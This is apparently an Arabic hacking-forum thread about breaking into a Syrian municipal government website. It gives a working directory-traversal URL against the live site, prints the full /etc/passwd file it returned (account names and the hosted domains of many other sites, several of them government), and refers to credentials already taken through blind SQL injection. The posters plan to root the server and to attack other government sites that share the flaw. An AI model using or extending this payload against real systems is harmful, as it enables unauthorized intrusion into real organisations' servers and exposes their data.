اخواني أنا سحيت اليوزر والباس المشفر لهذا الموقع الحكومي السوري ولكن ما لقيت مسار لوحة التحكم بتمنى حد يساعدني و****

http://latakia-city.gov.sy/

السلام الموقع فيه اضافة الى البليند سكيول ثغرة Directory Traversal وهي
وسوف اقوم بشرح لها الى غاية ترويت السيرفر


http://latakia-city.gov.sy/index.php?lang=../../../../../../../../../../etc/passwd%00.png&p_name=homepage





root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
techiweb:x:500:500::/home/techiweb:/bin/bash
sshadmin:x:501:501::/home/sshadmin:/bin/bash
admin:x:0:0:admin:/home/admin:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
tomcat:x:91:91:Tomcat:/usr/share/tomcat5:/bin/sh
apache:x:48:48:Apache:/var/www:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
alias:x:2021:2020:Qmail User:/var/qmail/alias:/sbin/nologin
qmaild:x:2020:2020:Qmail User:/var/qmail/:/sbin/nologin
qmaill:x:2022:2020:Qmail User:/var/qmail/:/sbin/nologin
qmailp:x:2023:2020:Qmail User:/var/qmail/:/sbin/nologin
qmailq:x:2520:2520:Qmail User:/var/qmail/:/sbin/nologin
qmailr:x:2521:2520:Qmail User:/var/qmail/:/sbin/nologin
qmails:x:2522:2520:Qmail User:/var/qmail/:/sbin/nologin
popuser:x:110:31:POP3 service user:/var/qmail/popuser:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
psaftp:x:2523:2521:anonftp psa user:/:/sbin/nologin
psaadm:x:2524:2522:Admin Server:/:/sbin/nologin
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
kluser:x:2525:2525:Kaspersky AntiVirus scanner user:/var/db/kav:/sbin/nologin
drweb:x:111:2526:Dr.Web daemon account:/var/drweb:/sbin/nologin
bakaloria_user:x:10002:2524::/var/www/vhosts/bakaloria.bakaloria.com:/bin/bash
aldassouki:x:10005:2524::/var/www/vhosts/aldassouki.com:/bin/false
creative-sy.com:x:10006:2524::/var/www/vhosts/creative-sy.com:/bin/false
ibn-khaldone:x:10007:2524::/var/www/vhosts/ibn-khaldone.com:/bin/false
hasanisoc:x:10009:2524::/var/www/vhosts/hasanisoc.net:/bin/false
damasreef:x:10011:2524::/var/www/vhosts/damasreef-elec.gov.sy:/bin/false
leader-kid:x:10017:2524::/var/www/vhosts/leader-kid.com:/bin/false
halwani-tahhan:x:10018:2524::/var/www/vhosts/halwani-tahhan.net:/bin/false
itqanf:x:10003:2524::/var/www/vhosts/itqan-properties.com:/bin/false
sw-cp-server:x:10019:2527::/:/bin/true
mhandlers-user:x:30:31:mail handlers user:/:/sbin/nologin
otellotex:x:10012:2524::/var/www/vhosts/otellotex.com:/bin/false
rappelzbay:x:10013:2524::/var/www/vhosts/rappelzbay.com:/bin/false
arabtvet:x:10021:2524::/var/www/vhosts/arabtvet.net:/bin/false
danny:x:10022:10022::/home/danny:/bin/bash
taftp:x:10023:10023::/home/taftp:/bin/bash
arab-innovation:x:10025:2524::/var/www/vhosts/arab-innovation.net:/bin/false
sleiman-agri:x:10026:2524::/var/www/vhosts/sleiman-agri.com:/bin/false
fcartp:x:10027:2524::/var/www/vhosts/carters-craft.com:/bin/false
andalus:x:10028:2524::/var/www/vhosts/andalusia-group.com:/bin/false
issy:x:10030:2524::/var/www/vhosts/schools.is.sy:/bin/false
meengcom:x:10032:2524::/var/www/vhosts/mideast-eng.com:/bin/false
dayaftp:x:10033:2524::/var/www/vhosts/aldayeh-sy.com:/bin/false
abiraalam:x:10001:2524::/var/www/vhosts/abeerworld.com:/bin/false
arabiateftp:x:10008:2524::/var/www/vhosts/arabiaty.com:/bin/false
aitccftp:x:10020:2524::/var/www/vhosts/aitc-sy.com:/bin/false
bakarchive:x:10024:2524::/var/www/vhosts/backup.bakaloria.com:/bin/false
almukhtar:x:10010:2524::/var/www/vhosts/almukhtarschools.net:/bin/false
panftparab:x:10031:2524::/var/www/vhosts/pan-arab-research.net:/bin/false
refaeiftp:x:10029:2524::/var/www/vhosts/a-alrefai.net:/bin/false
arabftpcinftp:x:10016:2524::/var/www/vhosts/arabcin.net:/bin/false
arabftpcinnet:x:10014:2524::/var/www/vhosts/alarabiclub.org:/bin/false
raniaftp:x:10004:2524::/var/www/vhosts/rania-fashion.com:/bin/false
emtekftp:x:10015:2524::/var/www/vhosts/emtech-lb.com:/bin/false
taftp11:x:10034:2524::/var/www/vhosts/teacharabia.com:/bin/false
classlogft:x:10035:2524::/var/www/vhosts/classmallsyria.com:/bin/false
s_fvu:x:10036:2524::/var/www/vhosts/svu.teacharabia.com:/bin/false
highlog4:x:10037:2524::/var/www/vhosts/high-less.com:/bin/false
bakalorftp11:x:10038:2524::/var/www/vhosts/bakaloria.com:/bin/false
tcmsuser:x:502:502::/var/www/html:/bin/sh
mango:x:10039:2524::/var/www/vhosts/telemango.net:/bin/false
abdbaka:x:10038:2524::/var/www/vhosts/bakaloria.com/httpdocs/2011:/bin/false
ttftpoole:x:10040:2524::/var/www/vhosts/tootle.me:/bin/false
salamboys:x:10041:2524::/var/www/vhosts/ds.taschool.net:/bin/false
academ11ftp:x:10042:2524::/var/www/vhosts/academiasyria.com:/bin/false
appftpr:x:10043:2524::/var/www/vhosts/appricots.net:/bin/false
spfapte:x:10044:2524::/var/www/vhosts/spacepowerapp.com:/bin/false
tart11fpt:x:10045:2524::/var/www/vhosts/tartous-city.gov.sy:/bin/false
alftppo11:x:10046:2524::/var/www/vhosts/city.aleppo-city.gov.sy:/bin/false
hmfp11:x:10047:2524::/var/www/vhosts/homs-city.gov.sy:/bin/false
amnfpt11:x:10048:2524::/var/www/vhosts/alameen-sy.com:/bin/false
pftt11myra:x:10049:2524::/var/www/vhosts/palmyra-city.gov.sy:/bin/false
obfftaap:x:10050:2524::/var/www/vhosts/obaa-sy.com:/bin/false
ltftp11:x:10052:2524::/var/www/vhosts/latakia-city.gov.sy:/bin/false
odlftp11:x:10053:2524::/var/www/vhosts/old-damascus.gov.sy:/bin/false
drfppt11:x:10051:2524::/var/www/vhosts/deirezzor-city.gov.sy:/bin/false

يعني أخي هل من الممكن اختراقه ولو ممكن يا ريت تحكيلي لانه لازم نخترقه هو وعدة مواقع حكوميه لها نفس النظام والثغرة نصرة للشعب السوري